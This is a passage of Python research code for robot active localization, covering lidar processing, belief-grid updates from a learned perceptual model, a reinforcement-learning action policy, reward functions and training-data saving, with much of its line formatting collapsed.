    def generate_data(self):
        # data index: D
        # n envs : E
        # n episodes: N
        # file-number(D) = D//N = E,
        # data index in the file = D % N
        # map file number = D//N = E
        index = "%05d" % (self.data_cnt)
        target_data = self.gt_likelihood_unnormalized
        range_data = np.array(self.scan_data.ranges)
        angle_array = np.linspace(self.scan_data.angle_min, self.scan_data.angle_max, range_data.size, endpoint=False)
        scan_data_to_save = np.stack((range_data, angle_array), axis=1)  # first column: range, second column: angle
        self.target_list.append(target_data)
        self.scan_list.append(scan_data_to_save)
        if self.args.verbose > 2:
            print("target_list", len(self.target_list))
            print("scan_list", len(self.scan_list))
        if self.done:
            scans = np.stack(self.scan_list, axis=0)
            targets = np.stack(self.target_list, axis=0)
            np.save(os.path.join(self.data_path, 'scan-%s.npy'%index), scans)
            np.save(os.path.join(self.data_path, 'map-%s.npy'%index), self.map_for_LM)
            np.save(os.path.join(self.data_path, 'target-%s.npy'%index), targets)
            self.scan_list = []
            self.target_list = []
            self.data_cnt += 1
            if self.args.verbose > 0:
                print("%s: map %s, scans %s, targets %s"%(index, self.map_for_LM.shape, scans.shape, targets.shape))
        return

    def stack_data(self):
        target_data = self.gt_likelihood_unnormalized
        range_data = np.array(self.scan_data.ranges_2pi, np.float32)
        angle_array = np.array(self.scan_data.angles_2pi, np.float32)
        scan_data_to_save = np.stack((range_data, angle_array), axis=1)  # first column: range, second column: angle
        self.target_list.append(target_data)
        self.scan_list.append(scan_data_to_save)
        if self.args.verbose > 2:
            print("target_list", len(self.target_list))
            print("scan_list", len(self.scan_list))

    def save_generated_data(self):
        scans = np.stack(self.scan_list, axis=0)
        targets = np.stack(self.target_list, axis=0)
        np.save(os.path.join(self.data_path, 'scan-%05d.npy'%self.data_cnt), scans)
        np.save(os.path.join(self.data_path, 'map-%05d.npy'%self.data_cnt), self.map_for_LM)
        np.save(os.path.join(self.data_path, 'target-%05d.npy'%self.data_cnt), targets)
        if self.args.verbose > 0:
            print("%05d: map %s, scans %s, targets %s"%(self.data_cnt, self.map_for_LM.shape, scans.shape, targets.shape))
        self.scan_list = []
        self.target_list = []
        self.data_cnt += 1

    def collect_data(self):
        # ENV-EPI-STP-CNT
        # map, scan, belief, likelihood, GTL, policy, action, reward
        # input = [map, scan]
        # target = [GTL]
        # state = [map-low-dim, bel, scan-low-dim]
        # action_reward = [action, p0, p1, p2, reward]
        # index = "%03d-%03d-%03d-%04d"%(self.env_count,self.episode_count,self.step_count,self.data_cnt)
        index = "%05d" % (self.data_cnt)
        env_index = "%05d" % (self.env_count)
        with open(self.rollout_list, 'a') as ro:
            ro.write('%d %d %d %d\n'%(self.env_count, self.episode_count, self.step_count, self.data_cnt))
        map_file = os.path.join(self.data_path, 'map-%s.npy'%env_index)
        if not os.path.isfile(map_file):
            # save the map
            np.save(map_file, self.map_for_LM)
        target_data = self.gt_likelihood_unnormalized
        gt_pose = np.array((self.true_grid.head, self.true_grid.row, self.true_grid.col)).reshape(1, -1)
        map_num =
np.array([self.env_count]) range_data=np.array(self.scan_data.ranges) angle_array = np.linspace(self.scan_data.angle_min, self.scan_data.angle_max,range_data.size, endpoint=False) scan_data_to_save = np.stack((range_data,angle_array),axis=1) #first column: range, second column: angle real_pose = np.array((self.current_pose.theta, self.current_pose.x, self.current_pose.y)).reshape(1,-1) dict_to_save = {'scan':scan_data_to_save, 'mapindex':map_num, 'target':target_data, 'belief': self.belief.detach().cpu().numpy(), 'like':self.likelihood.detach().cpu().numpy(), 'action': self.action_idx, 'prob':self.prob.reshape(1,-1), 'reward': self.reward_vector.reshape(1,-1), 'gt_pose': gt_pose, 'real_pose': real_pose} np.save(os.path.join(self.data_path, 'data-%s.npy'%index), dict_to_save) self.data_cnt+=1 return def compute_gtl(self, ref_scans): if self.args.gtl_off == True: gt = np.random.rand(self.grid_dirs, self.grid_rows, self.grid_cols) gt = np.clip(gt, 1e-5, 1.0) gt=gt/gt.sum() self.gt_likelihood = gt # self.gt_likelihood = torch.tensor(gt).float().to(self.device) else: if self.args.gtl_src == 'hd-corr': self.get_gt_likelihood_corr(ref_scans, clip=0) elif self.args.gtl_src == 'hd-corr-clip': self.get_gt_likelihood_corr(ref_scans, clip=1) elif self.args.gtl_src == 'hd-cos': self.gt_likelihood = self.get_gt_likelihood_cossim(ref_scans, self.scan_data_at_unperturbed) else: raise Exception('GTL source required: --gtl-src= [low-dim-map, high-dim-map]') self.normalize_gtl() def run_action_module(self): if self.args.random_policy: fwd_collision = self.collision_fnc(0, 0, 0, self.scan_2d_slide) if fwd_collision: num_actions = 2 else: num_actions = 3 self.action_from_policy = np.random.randint(num_actions) self.action_str = self.action_space[self.action_from_policy] else: mark_time = time.time() self.get_action() print('[ACTION] %.3f sec '%(time.time()-mark_time)) if self.args.figure: # update part of figure after getting action self.ax_map.set_title('action(%d):%s'%(self.step_count,self.action_str)) ax = self.ax_act self.update_act_dist(ax) ax=self.ax_rew act_lttr=['L','R','F','-'] self.obj_rew= self.update_list(ax,self.rewards,self.obj_rew,"Reward", text=act_lttr[self.action_idx]) ax=self.ax_err self.obj_err = self.update_list(ax,self.xyerrs,self.obj_err,"Error") mark_time = time.time() plt.pause(1e-4) print('[TIME for PAUSE FIGURE] %.3f sec '%(time.time()-mark_time)) self.sample_action() if self.args.figure: # update part of figure after getting action self.ax_map.set_title('action(%d):%s'%(self.step_count,self.action_str)) mark_time = time.time() self.save_figure() print('[TIME for SAVE FIGURE] %.3f sec '%(time.time()-mark_time)) def update_likelihood_rotate(self, map_img, scan_imgs, compute_loss=True): map_img = map_img.copy() if self.args.flip_map > 0: locs = np.random.randint(0, map_img.shape[0], (2, np.random.randint(self.args.flip_map+1))) xs = locs[0] ys = locs[1] map_img[xs,ys]=1-map_img[xs,ys] if self.perceptual_model == None: return self.likelihood else: likelihood = torch.zeros((self.grid_dirs,self.grid_rows, self.grid_cols), device=torch.device(self.device), dtype=torch.float) if self.args.verbose>1: print("update_likelihood_rotate") if self.args.ch3=="ZERO": input_batch = np.zeros((self.grid_dirs, 3, self.map_rows, self.map_cols)) for i in range(self.grid_dirs): # for all orientations input_batch[i, 0, :,:] = map_img input_batch[i, 1, :,:] = scan_imgs[i,:,:] input_batch[i, 2, :,:] = np.zeros_like(map_img) elif self.args.ch3=="RAND": input_batch = np.zeros((self.grid_dirs, 3, self.map_rows, 
self.map_cols)) for i in range(self.grid_dirs): # for all orientations input_batch[i, 0, :,:] = map_img input_batch[i, 1, :,:] = scan_imgs[i,:,:] input_batch[i, 2, :,:] = np.random.random(map_img.shape) else: input_batch = np.zeros((self.grid_dirs, 2, self.map_rows, self.map_cols)) for i in range(self.grid_dirs): # for all orientations input_batch[i, 0, :,:] = map_img input_batch[i, 1, :,:] = scan_imgs[i,:,:] input_batch = torch.from_numpy(input_batch).float() output = self.perceptual_model.forward(input_batch) output_softmax = F.softmax(output.view([1,-1])/self.args.temperature, dim= 1) # shape (1,484) if self.args.n_lm_grids != self.args.n_local_grids: # LM output size != localization space size: adjust LM output to fit to localization space. nrows = self.args.n_lm_grids #self.grid_rows/self.args.sub_resolution ncols = self.args.n_lm_grids #self.grid_cols/self.args.sub_resolution like = output_softmax.cpu().detach().numpy().reshape((self.grid_dirs, nrows, ncols)) for i in range(self.grid_dirs): likelihood[i,:,:] = torch.tensor(cv2.resize(like[i,:,:], (self.grid_rows,self.grid_cols))).float().to(self.device) likelihood /= likelihood.sum() else: likelihood = output_softmax.reshape(likelihood.shape) del output_softmax, input_batch, output if compute_loss: self.compute_loss(likelihood) return likelihood # self.likelihood = torch.clamp(self.likelihood, 1e-9, 1.0) # self.likelihood = self.likelihood/self.likelihood.sum() def compute_loss(self, likelihood): gtl = torch.tensor(self.gt_likelihood).float().to(self.device) if self.args.pm_loss == "KL": self.loss_ll = (gtl * torch.log(gtl/likelihood)).sum() elif self.args.pm_loss == "L1": self.loss_ll = torch.abs(likelihood - gtl).sum() if self.args.update_pm_by=="GTL" or self.args.update_pm_by=="BOTH": if len(self.loss_likelihood) < self.args.pm_batch_size: self.loss_likelihood.append(self.loss_ll) if self.args.verbose > 2: print ("loss_likelihood", len(self.loss_likelihood)) if len(self.loss_likelihood) >= self.args.pm_batch_size: self.back_prop_pm() self.loss_likelihood = [] del gtl def mask_likelihood(self): the_mask = torch.tensor(np.ones([self.grid_dirs, self.grid_rows, self.grid_cols])).float().to(self.device) for i in range(self.grid_rows): for j in range(self.grid_cols): if self.map_for_pose[i, j]>0.5: the_mask[:,i,j]=0.0 self.likelihood = self.likelihood * the_mask #self.likelihood = torch.clamp(self.likelihood, 1e-9, 1.0) self.likelihood = self.likelihood/self.likelihood.sum() def product_belief(self): if self.args.verbose>1: print("product_belief") # back up prior belief if self.args.use_gt_likelihood : # gt = torch.from_numpy(self.gt_likelihood/self.gt_likelihood.sum()).float().to(self.divice) gt = torch.tensor(self.gt_likelihood).float().to(self.device) self.belief = self.belief * (gt) #self.belief = self.belief * (self.gt_likelihood) else: self.belief = self.belief * (self.likelihood) #normalize belief self.belief /= self.belief.sum() #update bel_grid guess = np.unravel_index(np.argmax(self.belief.cpu().detach().numpy(), axis=None), self.belief.shape) self.bel_grid = Grid(head=guess[0],row=guess[1],col=guess[2]) def do_the_honors(self, pose, belief): scan_data = self.get_virtual_lidar(pose) scan_2d, _ = self.get_scan_2d_n_headings(scan_data, self.xlim, self.ylim) if self.args.use_gt_likelihood: gtl = self.get_gt_likelihood_cossim(self.scans_over_map, scan_data) likelihood = softmax(gtl, self.args.temperature) likelihood = torch.tensor(likelihood).float().to(self.device) else: likelihood = self.update_likelihood_rotate(self.map_for_LM, 
scan_2d, compute_loss=False) bel = belief * likelihood bel /= bel.sum() new_bel_ent = float((bel * torch.log(bel)).sum()) return new_bel_ent - self.bel_ent def get_markov_action(self): max_ent_diff = -np.inf sampled_action_str = "" # update belief entropy self.bel_ent = (self.belief * torch.log(self.belief)).sum().detach() fwd_collision = self.collision_fnc(0, 0, 0, self.scan_2d_slide) if fwd_collision: action_space = ['turn_left','turn_right'] else: action_space = ['turn_left','turn_right','go_fwd'] for afp, action_str in enumerate(action_space): virtual_target = self.get_virtual_target_pose(action_str) ### transit the belief according to the action bel = self.belief.cpu().detach().numpy() # copy current belief into numpy bel = self.trans_bel(bel, action_str) # transition off the actual trajectory bel = torch.from_numpy(bel).float().to(self.device)#$ requires_grad=True) ent_diff = self.do_the_honors(virtual_target, bel) if ent_diff > max_ent_diff: max_ent_diff = ent_diff sampled_action_str = action_str self.action_str = sampled_action_str self.action_from_policy = afp def get_action(self): if self.args.markov: self.get_markov_action() return if self.args.verbose>1: print("get_action") if self.step_count==0: self.cx = torch.zeros(1, 256) self.hx = torch.zeros(1, 256) # self.cx = Variable(torch.zeros(1, 256)) # self.hx = Variable(torch.zeros(1, 256)) else: # these are internal states of LSTM. not for back-prop. so, detach them. self.cx = self.cx.detach() #Variable(self.cx.data) self.hx = self.hx.detach() #Variable(self.hx.data) self.scan_2d_low_tensor[0,:,:]=torch.from_numpy(self.scan_2d_low).float().to(self.device) # state = torch.cat((self.map_for_RL.detach(), self.belief, self.scan_2d_low_tensor.detach()), dim=0) if self.args.n_state_grids == self.args.n_local_grids and self.args.n_state_dirs == self.args.n_headings: # no downsample. preserve the path for backprop belief_downsample = self.belief else: belief_downsample = np.zeros((self.args.n_state_dirs, self.args.n_state_grids, self.args.n_state_grids)) dirs = range(self.bel_grid.head%(self.grid_dirs/self.args.n_state_dirs),self.grid_dirs,self.grid_dirs/self.args.n_state_dirs) for i,j in enumerate(dirs): bel = self.belief[j,:,:].cpu().detach().numpy() bel = cv2.resize(bel, (self.args.n_state_grids,self.args.n_state_grids))#,interpolation=cv2.INTER_NEAREST) belief_downsample[i,:,:] = bel belief_downsample /= belief_downsample.sum() belief_downsample = torch.from_numpy(belief_downsample).float().to(self.device) if self.args.n_state_grids == self.args.n_local_grids and self.args.n_state_dirs == self.args.n_headings: # no downsample. 
preserve the path for backprop likelihood_downsample = self.likelihood else: likelihood_downsample = np.zeros((self.args.n_state_dirs, self.args.n_state_grids, self.args.n_state_grids)) dirs = range(self.bel_grid.head%(self.grid_dirs/self.args.n_state_dirs),self.grid_dirs,self.grid_dirs/self.args.n_state_dirs) for i,j in enumerate(dirs): lik = self.likelihood[j,:,:].cpu().detach().numpy() lik = cv2.resize(lik, (self.args.n_state_grids,self.args.n_state_grids))#,interpolation=cv2.INTER_NEAREST) likelihood_downsample[i,:,:] = lik likelihood_downsample /= likelihood_downsample.sum() likelihood_downsample = torch.from_numpy(likelihood_downsample).float().to(self.device) ## map_for_RL : resize it: n_maze_grids --> n_state_grids ## scan_2d_low_tensor: n_state_grids if self.args.RL_type == 0: state = torch.cat((self.map_for_RL.detach(), belief_downsample, self.scan_2d_low_tensor.detach()), dim=0) elif self.args.RL_type == 1: state = torch.cat((belief_downsample, self.scan_2d_low_tensor.detach()), dim=0) elif self.args.RL_type == 2: state = torch.cat((belief_downsample, likelihood_downsample), dim=0) state2 = torch.stack((torch.from_numpy(self.map_for_LM.astype(np.float32)), torch.from_numpy(self.scan_2d_slide.astype(np.float32))), dim=0) if self.args.update_pm_by=="BOTH" or self.args.update_pm_by=="RL": if self.args.RL_type == 2: value, logit, (self.hx, self.cx) = self.policy_model.forward((state.unsqueeze(0), state2.unsqueeze(0), (self.hx, self.cx))) else: value, logit, (self.hx, self.cx) = self.policy_model.forward((state.unsqueeze(0), (self.hx, self.cx))) else: if self.args.RL_type == 2: value, logit, (self.hx, self.cx) = self.policy_model.forward((state.detach().unsqueeze(0), state2.detach().unsqueeze(0), (self.hx, self.cx))) else: value, logit, (self.hx, self.cx) = self.policy_model.forward((state.detach().unsqueeze(0), (self.hx, self.cx))) #state.register_hook(print) prob = F.softmax(logit, dim=1) log_prob = F.log_softmax(logit, dim=1) entropy = -(log_prob * prob).sum(1, keepdim=True) if self.optimizer != None: self.entropies.append(entropy) if self.args.verbose>2: print ("entropies", len(self.entropies)) #argmax for action if self.args.action == 'argmax' or self.rl_test: action = [[torch.argmax(prob)]] action = torch.as_tensor(action)#, device=self.device) elif self.args.action == 'multinomial': #multinomial sampling for action # prob = torch.clamp(prob, 1e-10, 1.0) if self.args.update_rl == False: fwd_collision = self.collision_fnc(0, 0, 0, self.scan_2d_slide) if fwd_collision: prob[0,2]=0 action = prob.multinomial(num_samples=1) #.cpu().detach() else: raise Exception('action sampling method required') self.prob=prob.cpu().detach().numpy() #action = sample(logit) #log_prob = log_prob.gather(1, Variable(action)) log_prob = log_prob.gather(1, action) #print ('1:%f, 2:%f'%(log_prob.gather(1,action), log_prob[0,action])) # if self.args.detach_models == True: # intri_reward = self.intri_model(Variable(state.unsqueeze(0)), action) # else: # intri_reward = self.intri_model(state.unsqueeze(0), action) # self.intri_rewards.append(intri_reward) if self.optimizer != None: self.values.append(value) self.log_probs.append(log_prob) if self.args.verbose > 2: print ("values", len(self.values)) print ("log_probs", len(self.log_probs)) #self.log_probs.append(log_prob[0,action]) self.action_str = self.action_space[action.item()] self.action_from_policy = action.item() del state, log_prob, value, action, belief_downsample, entropy, prob def sample_action(self): if self.args.manual_control: action = -1 while 
action < 0: print ("suggested action: %s"%self.action_str) if self.args.num_actions == 4: keyin = raw_input ("[f]orward/[l]eft/[r]ight/[h]old/[a]uto/[c]ontinue/[n]ext_ep/[q]uit: ") elif self.args.num_actions == 3: keyin = raw_input ("[f]orward/[l]eft/[r]ight/[a]uto/[c]ontinue/[n]ext_ep/[q]uit: ") if keyin == "f": action = 2 elif keyin == "l": action = 0 elif keyin == "r": action = 1 elif keyin == "h" and self.args.num_actions == 4: action = 3 elif keyin == "a": action = self.action_from_policy elif keyin == "c": self.args.manual_control = False action = self.action_from_policy elif keyin == "n": self.skip_to_end = True self.step_count = self.step_max-1 action = self.action_from_policy elif keyin == "q": self.quit_sequence() self.action_idx = action self.action_str = self.action_space[self.action_idx] else: self.action_idx = self.action_from_policy self.action_str = self.action_space[self.action_idx] def quit_sequence(self): self.wrap_up() if self.args.jay1 or self.args.gazebo: rospy.logwarn("Quit") rospy.signal_shutdown("Quit") exit() def get_virtual_target_pose(self, action_str): start_pose = Pose2d(0,0,0) start_pose.x = self.believed_pose.x start_pose.y = self.believed_pose.y start_pose.theta = self.believed_pose.theta goal_pose = Pose2d(0,0,0) offset = self.heading_resol*self.args.rot_step if action_str == "turn_right": goal_pose.theta = wrap(start_pose.theta-offset) goal_pose.x = start_pose.x goal_pose.y = start_pose.y elif action_str == "turn_left": goal_pose.theta = wrap(start_pose.theta+offset) goal_pose.x = start_pose.x goal_pose.y = start_pose.y elif action_str == "go_fwd": goal_pose.x = start_pose.x + math.cos(start_pose.theta)*self.fwd_step_meters goal_pose.y = start_pose.y + math.sin(start_pose.theta)*self.fwd_step_meters goal_pose.theta = start_pose.theta elif action_str == "hold": return start_pose else: print('undefined action name %s'%action_str) exit() return goal_pose def update_target_pose(self): self.last_pose.x = self.perturbed_goal_pose.x self.last_pose.y = self.perturbed_goal_pose.y self.last_pose.theta = self.perturbed_goal_pose.theta self.start_pose.x = self.believed_pose.x self.start_pose.y = self.believed_pose.y self.start_pose.theta = self.believed_pose.theta offset = self.heading_resol*self.args.rot_step if self.action_str == "turn_right": self.goal_pose.theta = wrap(self.start_pose.theta-offset) self.goal_pose.x = self.start_pose.x self.goal_pose.y = self.start_pose.y elif self.action_str == "turn_left": self.goal_pose.theta = wrap(self.start_pose.theta+offset) self.goal_pose.x = self.start_pose.x self.goal_pose.y = self.start_pose.y elif self.action_str == "go_fwd": self.goal_pose.x = self.start_pose.x + math.cos(self.start_pose.theta)*self.fwd_step_meters self.goal_pose.y = self.start_pose.y + math.sin(self.start_pose.theta)*self.fwd_step_meters self.goal_pose.theta = self.start_pose.theta elif self.action_str == "hold": return else: print('undefined action name %s'%self.action_str) exit() delta_x, delta_y = 0,0 delta_theta = 0 if self.args.process_error[0]>0 or self.args.process_error[1]>0: delta_x, delta_y = np.random.normal(scale=self.args.process_error[0],size=2) delta_theta = np.random.normal(scale=self.args.process_error[1]) if self.args.verbose > 1: print ('%f, %f, %f'%(delta_x, delta_y, math.degrees(delta_theta))) self.perturbed_goal_pose.x = self.goal_pose.x+delta_x self.perturbed_goal_pose.y = self.goal_pose.y+delta_y self.perturbed_goal_pose.theta = wrap(self.goal_pose.theta+delta_theta) def collision_fnc(self, x, y, rad, img): corner0 = 
[x+rad,y+rad] corner1 = [x-rad,y-rad] x0 = to_index(corner0[0], self.map_rows, self.xlim) y0 = to_index(corner0[1], self.map_cols, self.ylim) x1 = to_index(corner1[0], self.map_rows, self.xlim) y1 = to_index(corner1[1], self.map_cols, self.ylim) if x0 < 0 : return True if y0 < 0: return True if x1 >= self.map_rows: return True if y1 >= self.map_cols: return True # x0 = max(0, x0) # y0 = max(0, y0) # x1 = min(self.map_rows-1, x1) # y1 = min(self.map_cols-1, y1) if rad == 0: if img[x0, y0] > 0.5 : return True else: return False else: pass for ir in range(x0,x1+1): for ic in range(y0,y1+1): dx = to_real(ir, self.xlim, self.map_rows) - x dy = to_real(ic, self.ylim, self.map_cols) - y dist = np.sqrt(dx**2+dy**2) if dist <= rad and img[ir,ic]==1.0: return True return False def collision_check(self): row=to_index(self.perturbed_goal_pose.x, self.grid_rows, self.xlim) col=to_index(self.perturbed_goal_pose.y, self.grid_cols, self.ylim) x = self.perturbed_goal_pose.x y = self.perturbed_goal_pose.y rad = self.collision_radius if self.args.collision_from == "scan" and self.action_str == "go_fwd": self.collision = self.collision_fnc(0, 0, 0, self.scan_2d_slide) elif self.args.collision_from == "map": self.collision = self.collision_fnc(x,y,rad, self.map_for_LM) else: self.collision = False if self.collision: self.collision_pose.x = self.perturbed_goal_pose.x self.collision_pose.y = self.perturbed_goal_pose.y self.collision_pose.theta = self.perturbed_goal_pose.theta self.collision_grid.row = row self.collision_grid.col = col self.collision_grid.head = self.true_grid.head if self.collision: #undo update target self.perturbed_goal_pose.x = self.last_pose.x self.perturbed_goal_pose.y = self.last_pose.y self.perturbed_goal_pose.theta = self.last_pose.theta def get_virtual_lidar(self, current_pose): ranges = self.get_a_scan(current_pose.x, current_pose.y, offset=current_pose.theta) bearing_deg = np.arange(360.0) mindeg=0 maxdeg=359 incrementdeg=1 params = {'ranges': ranges, 'angle_min': math.radians(mindeg), 'angle_max': math.radians(maxdeg), 'range_min': self.min_scan_range, 'range_max': self.max_scan_range} scan_data = Lidar(**params) return scan_data def get_lidar(self): mindeg=0 maxdeg=359 if self.args.gazebo: params = {'ranges': self.raw_scan.ranges, 'angle_min': self.raw_scan.angle_min, 'angle_max': self.raw_scan.angle_max, 'range_min': self.raw_scan.range_min, 'range_max': self.raw_scan.range_max} elif self.args.jay1: params = {'ranges': self.raw_scan.ranges, 'angle_min': self.raw_scan.angle_min, 'angle_max': self.raw_scan.angle_max, 'range_min': self.raw_scan.range_min, 'range_max': self.raw_scan.range_max} else: ranges = self.get_a_scan(self.current_pose.x, self.current_pose.y, offset=self.current_pose.theta, noise=self.args.lidar_noise) # bearing_deg = np.arange(360.0) # incrementdeg=1 params = {'ranges': ranges, 'angle_min': math.radians(mindeg), 'angle_max': math.radians(maxdeg), 'range_min': self.min_scan_range, 'range_max': self.max_scan_range} self.scan_data = Lidar(**params) if self.args.gazebo or self.args.jay1: params = {'ranges': self.raw_scan.ranges, 'angle_min': self.raw_scan.angle_min, 'angle_max': self.raw_scan.angle_max, 'range_min': self.raw_scan.range_min, 'range_max': self.raw_scan.range_max} ## it's same as the actual scan. 
self.scan_data_at_unperturbed = Lidar(**params) else: ## scan_data @ unperturbed pose x = to_real(self.true_grid.row, self.xlim, self.grid_rows) y = to_real(self.true_grid.col, self.ylim, self.grid_cols) offset = self.heading_resol*self.true_grid.head ranges = self.get_a_scan(x, y, offset=offset, noise=0) params = {'ranges': ranges, 'angle_min': math.radians(mindeg), 'angle_max': math.radians(maxdeg), 'range_min': self.min_scan_range, 'range_max': self.max_scan_range} self.scan_data_at_unperturbed = Lidar(**params) def get_lidar_bottom(self): params = {'ranges': self.raw_scan_bottom.ranges, 'angle_min': self.raw_scan_bottom.angle_min, 'angle_max': self.raw_scan_bottom.angle_max, 'range_min': self.raw_scan_bottom.range_min, 'range_max': self.raw_scan_bottom.range_max} self.scan_data_bottom = Lidar(**params) def fwd_clear(self): robot_width = 2*self.collision_radius safe_distance = 0.05 + self.collision_radius left_corner = (wrap_2pi(np.arctan2(self.collision_radius, safe_distance))) right_corner = (wrap_2pi(np.arctan2(-self.collision_radius, safe_distance))) angles = self.scan_data.angles_2pi ranges = self.scan_data.ranges_2pi[(angles < left_corner) | (angles > right_corner)] ranges = ranges[(ranges != np.nan) & (ranges != np.inf) ] if ranges.size == 0: return True else: pass val = np.min(ranges) if val > safe_distance: return True else: print ('top',val) rospy.logwarn("Front is Not Clear ! (Top Scan)") return False def fwd_clear_bottom(self): if self.scan_bottom_ready: self.scan_bottom_ready = False else: return True safe_distance = 0.20 fwd_margin=safe_distance robot_rad = self.collision_radius left_corner = (wrap_2pi(np.arctan2(robot_rad, safe_distance))) right_corner = (wrap_2pi(np.arctan2(-robot_rad, safe_distance))) angles = self.scan_data_bottom.angles_2pi ranges = self.scan_data_bottom.ranges_2pi[(angles < left_corner) | (angles > right_corner)] # ranges = self.scan_data_bottom.ranges_2pi ranges = ranges[(ranges != np.nan) & (ranges != np.inf) ] if ranges.size == 0: return True else: pass val = np.min(ranges) if val > safe_distance: return True else: print ('bot',val) rospy.logwarn("Front is Not Clear ! 
(Bottom)") return False def execute_action_teleport(self): if self.args.verbose>1: print("execute_action_teleport") if self.collision: return False # if self.action_str == "go_fwd_blocked": # return True # if self.args.perturb > 0: # self.turtle_pose_msg.position.x = self.perturbed_goal_pose.x # self.turtle_pose_msg.position.y = self.perturbed_goal_pose.y # yaw = self.perturbed_goal_pose.theta # else: # self.turtle_pose_msg.position.x = self.goal_pose.x # self.turtle_pose_msg.position.y = self.goal_pose.y # yaw = self.goal_pose.theta # self.turtle_pose_msg.orientation = geometry_msgs.msg.Quaternion(*tf_conversions.transformations.quaternion_from_euler(0, 0, yaw)) self.teleport_turtle() return True def transit_belief(self): if self.args.verbose>1: print("transit_belief") self.belief = self.belief.cpu().detach().numpy() if self.collision == True: self.prior = np.copy(self.belief) self.belief = torch.from_numpy(self.belief).float().to(self.device) return self.belief=self.trans_bel(self.belief, self.action_str) self.belief = torch.from_numpy(self.belief).float().to(self.device)#$ requires_grad=True) self.prior = np.copy(self.belief) def trans_bel(self, bel, action): rotation_step = self.args.rot_step if action == "turn_right": bel=np.roll(bel,-rotation_step, axis=0) elif action == "turn_left": bel=np.roll(bel, rotation_step, axis = 0) elif action == "go_fwd": if self.args.trans_belief == "roll": i=0 bel[i,:,:]=np.roll(bel[i,:,:], -1, axis=0) i=1 bel[i,:,:]=np.roll(bel[i,:,:], -1, axis=1) i=2 bel[i,:,:]=np.roll(bel[i,:,:], 1, axis=0) i=3 bel[i,:,:]=np.roll(bel[i,:,:], 1, axis=1) elif self.args.trans_belief == "stoch-shift" or self.args.trans_belief == "shift": prior = bel.min() for i in range(self.grid_dirs): theta = i * self.heading_resol fwd_dist = self.args.fwd_step dx = fwd_dist*np.cos(theta+np.pi) dy = fwd_dist*np.sin(theta+np.pi) # simpler way: DX = np.round(dx) DY = np.round(dy) shft_hrz = shift(bel[i,:,:], int(DY), axis=1, fill=prior) bel[i,:,:]=shift(shft_hrz, int(DX), axis=0, fill=prior) if self.args.trans_belief == "stoch-shift" and action != "hold": for ch in range(self.grid_dirs): bel[ch,:,:] = ndimage.gaussian_filter(bel[ch,:,:], sigma=self.sigma_xy) n_dir = self.grid_dirs//4 p_roll = 0.20 roll_n = [] roll_p = [] for r in range(1, n_dir): if roll_n == [] and roll_p == []: roll_n.append(p_roll*np.roll(bel,-1,axis=0)) roll_p.append(p_roll*np.roll(bel, 1,axis=0)) else: roll_n.append(p_roll*np.roll(roll_n[-1],-1,axis=0)) roll_p.append(p_roll*np.roll(roll_p[-1], 1,axis=0)) bel = sum(roll_n + roll_p)+bel bel /= np.sum(bel) return bel def get_reward(self): self.xyerrs.append(self.get_manhattan(self.belief.cpu().detach().numpy(), ignore_hd = True) ) self.manhattan = self.get_manhattan(self.belief.cpu().detach().numpy(), ignore_hd = False) #manhattan distance between gt and belief. 
self.manhattans.append(self.manhattan) if self.args.verbose > 2: print ("manhattans", len(self.manhattans)) self.reward = 0.0 self.reward_vector = np.zeros(5) # if self.args.penalty_for_block and self.action_str == "go_fwd_blocked": if self.args.penalty_for_block != 0 and self.collision == True: self.reward_vector[0] -= self.args.penalty_for_block self.reward += -self.args.penalty_for_block if self.args.rew_explore and self.new_pose: self.reward_vector[1] += 1.0 self.reward += 1.0 if self.args.rew_bel_new and self.new_bel: self.reward_vector[1] += 1.0 self.reward += 1.0 if self.args.rew_bel_gt: N = self.grid_dirs*self.grid_rows*self.grid_cols self.reward_vector[2] += torch.log(N*self.belief[self.true_grid.head,self.true_grid.row,self.true_grid.col]).item() #detach().cpu().numpy() self.reward += torch.log(N*self.belief[self.true_grid.head,self.true_grid.row,self.true_grid.col]).item() #.data #detach().cpu().numpy() if self.args.rew_bel_gt_nonlog: self.reward_vector[2] += self.belief[self.true_grid.head,self.true_grid.row,self.true_grid.col].item()#detach().cpu().numpy() self.reward += self.belief[self.true_grid.head, self.true_grid. row,self.true_grid.col].item()#detach().cpu().numpy() if self.args.rew_KL_bel_gt: bel_gt = self.belief[self.true_grid.head, self.true_grid.row, self.true_grid.col].item()#detach().cpu().numpy() N = self.grid_dirs*self.grid_rows*self.grid_cols new_bel_gt = 1.0/N * np.log(N*np.clip(bel_gt,1e-9,1.0)) self.reward_vector[2] += new_bel_gt self.reward += new_bel_gt #torch.Tensor([new_bel_gt]) if self.args.rew_infogain: #entropy = -p*log(p) # reward = -entropy, low entropy bel = torch.clamp(self.belief, 1e-9, 1.0) # info gain = p*log(p) - q*log(q) # bel=self.belief # info_gain = (bel * torch.log(bel)).sum().detach() - self.bel_ent new_bel_ent = float((bel * torch.log(bel)).sum()) info_gain = new_bel_ent - self.bel_ent self.bel_ent = new_bel_ent self.reward += info_gain self.reward_vector[3] += info_gain if self.args.rew_bel_ent: #entropy = -p*log(p) # reward = -entropy, low entropy # bel = torch.clamp(self.belief, 1e-9, 1.0) bel=self.belief self.reward += (bel * torch.log(bel)).sum().item() #detach().cpu().numpy() self.reward_vector[3] += (bel * torch.log(bel)).sum().item() #detach().cpu().numpy() if self.args.rew_hit: self.reward += 1 if self.manhattan==0 else 0 self.reward_vector[4] += 1 if self.manhattan==0 else 0 if self.args.rew_dist: self.reward += (self.longest-self.manhattan)/self.longest self.reward_vector[4] = (self.longest-self.manhattan)/self.longest if self.args.rew_inv_dist: self.reward += 1.0/(self.manhattan+1.0) self.reward_vector[4] = 1.0/(self.manhattan+1.0) self.reward = float(self.reward) self.rewards.append(self.reward) if self.args.verbose > 2: print ("rewards", len(self.rewards)) if np.isnan(self.reward): raise Exception('reward=nan') if self.args.verbose > 1: print ('reward=%f'%self.reward) def get_euclidean(self): return np.sqrt((self.believed_pose.x - self.current_pose.x)**2+(self.believed_pose.y - self.current_pose.y)**2) def get_manhattan(self, bel, ignore_hd = False): # guess = np.unravel_index(np.argmax(bel, axis=None), bel.shape) guess = (self.bel_grid.head, self.bel_grid.row, self.bel_grid.col) #[self.bel_grid.head,self.bel_grid.x, self.bel_grid.y] e_dir = abs(guess[0]-self.true_grid.head) e_dir = min(self.grid_dirs-e_dir, e_dir) if ignore_hd: e_dir = 0 return float(e_dir+abs(guess[1]-self.true_grid.row)+abs(guess[2]-self.true_grid.col)) def back_prop(self): if self.args.markov: return if self.optimizer == None: return if 
